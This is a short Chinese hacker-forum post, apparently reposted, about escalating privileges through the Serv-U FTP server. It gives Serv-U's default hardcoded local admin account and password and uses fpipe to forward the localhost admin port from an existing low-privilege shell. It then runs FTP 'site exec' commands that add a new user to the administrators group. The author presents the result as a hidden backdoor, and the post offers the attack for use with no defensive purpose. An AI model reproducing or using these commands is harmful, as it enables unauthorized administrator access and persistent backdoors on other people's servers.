前几天在灰色轨迹上看到呢SERV-U下提升权限的一种新的方法~
以下转自:19800729
[serv-u默认监听127.0.0.1:43958,所以只有在本机才能连接这个管理端口。
serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码在同一个
版本中是固定的,也许在不同的版本中也是固定的。
假如目标机器IP是192.168.0.1,假如你已经有了一个目标机器的普通权限的SHELL,那么你
在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u
admin"新建SERVER,
192.168.0.1:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
,那么目标机器的serv-u就归你管了。
(不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了]
这种方法我在本地测试呢一下发现效果非常的好~!
转念一想,可以用他做个后门
方法同上
在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u
admin"新建SERVER,
192.168.0.1:12345
User:LocalAdministrator
Pass:#l@$ak#.lk;0@P
连上后,先建一个用户 目录指向c:\ 给他执行权限
使用方法
cmd
ftp 192.168.0.1
username
password
ftp>cd /winnt/system32
ftp>quote site exec net.exe user axin 1234 /add
ftp>quote site exec net.exe localgroup administrators axin /add
一个非常隐蔽的后门做成了
|